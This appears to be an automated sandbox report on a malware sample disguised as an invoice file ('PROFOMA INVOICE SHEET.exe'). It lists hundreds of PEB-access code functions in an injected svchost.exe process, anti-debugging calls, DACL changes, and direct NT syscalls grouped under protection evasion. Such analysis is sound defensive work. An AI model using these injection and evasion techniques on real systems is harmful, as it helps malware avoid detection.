            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C304E5 mov ecx, dword ptr fs:[00000030h]1_2_03C304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA49A mov eax, dword ptr fs:[00000030h]1_2_03CEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C364AB mov eax, dword ptr fs:[00000030h]1_2_03C364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C644B0 mov ecx, dword ptr fs:[00000030h]1_2_03C644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]1_2_03CBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA456 mov eax, dword ptr fs:[00000030h]1_2_03CEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2645D mov eax, dword ptr fs:[00000030h]1_2_03C2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5245A mov eax, dword ptr fs:[00000030h]1_2_03C5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC460 mov ecx, dword ptr fs:[00000030h]1_2_03CBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C427 mov eax, dword ptr fs:[00000030h]1_2_03C2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]1_2_03CDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EBFC mov eax, dword ptr fs:[00000030h]1_2_03C5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]1_2_03CBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]1_2_03C40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]1_2_03C40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03CE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03CE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]1_2_03CE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]1_2_03CE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]1_2_03CC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]1_2_03CC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFAB40 mov eax, dword ptr fs:[00000030h]1_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD8B42 mov eax, dword ptr fs:[00000030h]1_2_03CD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEB50 mov eax, dword ptr fs:[00000030h]1_2_03CDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2CB7E mov eax, dword ptr fs:[00000030h]1_2_03C2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]1_2_03C5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]1_2_03C5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]1_2_03CF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]1_2_03CF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30AD0 mov eax, dword ptr fs:[00000030h]1_2_03C30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]1_2_03C64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]1_2_03C64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]1_2_03C6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]1_2_03C6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04A80 mov eax, dword ptr fs:[00000030h]1_2_03D04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68A90 mov edx, dword ptr fs:[00000030h]1_2_03C68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]1_2_03C38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]1_2_03C38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86AA4 mov eax, dword ptr fs:[00000030h]1_2_03C86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]1_2_03C40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]1_2_03C40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEA60 mov eax, dword ptr fs:[00000030h]1_2_03CDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]1_2_03CACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]1_2_03CACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCA11 mov eax, dword ptr fs:[00000030h]1_2_03CBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA24 mov eax, dword ptr fs:[00000030h]1_2_03C6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EA2E mov eax, dword ptr fs:[00000030h]1_2_03C5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]1_2_03C54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]1_2_03C54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC69C0 mov eax, dword ptr fs:[00000030h]1_2_03CC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C649D0 mov eax, dword ptr fs:[00000030h]1_2_03C649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]1_2_03CFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]1_2_03CBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]1_2_03C629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]1_2_03C629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]1_2_03C309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]1_2_03C309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov esi, dword ptr fs:[00000030h]1_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]1_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]1_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0946 mov eax, dword ptr fs:[00000030h]1_2_03CB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov edx, dword ptr fs:[00000030h]1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]1_2_03CD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]1_2_03CD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC97C mov eax, dword ptr fs:[00000030h]1_2_03CBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]1_2_03CAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]1_2_03CAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC912 mov eax, dword ptr fs:[00000030h]1_2_03CBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]1_2_03C28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]1_2_03C28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB892A mov eax, dword ptr fs:[00000030h]1_2_03CB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC892B mov eax, dword ptr fs:[00000030h]1_2_03CC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]1_2_03C5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]1_2_03CFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03C6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03C6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30887 mov eax, dword ptr fs:[00000030h]1_2_03C30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC89D mov eax, dword ptr fs:[00000030h]1_2_03CBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C42840 mov ecx, dword ptr fs:[00000030h]1_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60854 mov eax, dword ptr fs:[00000030h]1_2_03C60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]1_2_03C34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]1_2_03C34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]1_2_03CBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]1_2_03CBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6870 mov eax, dword ptr fs:[00000030h]1_2_03CC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6870 mov eax, dword ptr fs:[00000030h]1_2_03CC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC810 mov eax, dword ptr fs:[00000030h]1_2_03CBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]1_2_03C52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]1_2_03C52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]1_2_03C52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52835 mov ecx, dword ptr fs:[00000030h]1_2_03C52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]1_2_03C52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]1_2_03C52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A830 mov eax, dword ptr fs:[00000030h]1_2_03C6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD483A mov eax, dword ptr fs:[00000030h]1_2_03CD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD483A mov eax, dword ptr fs:[00000030h]1_2_03CD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32FC8 mov eax, dword ptr fs:[00000030h]1_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32FC8 mov eax, dword ptr fs:[00000030h]1_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32FC8 mov eax, dword ptr fs:[00000030h]1_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32FC8 mov eax, dword ptr fs:[00000030h]1_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2EFD8 mov eax, dword ptr fs:[00000030h]1_2_03C2EFD8
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00360B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00360B62
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00332622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00332622
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0032083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0032083F
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003209D5 SetUnhandledExceptionFilter,0_2_003209D5
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00320C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00320C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
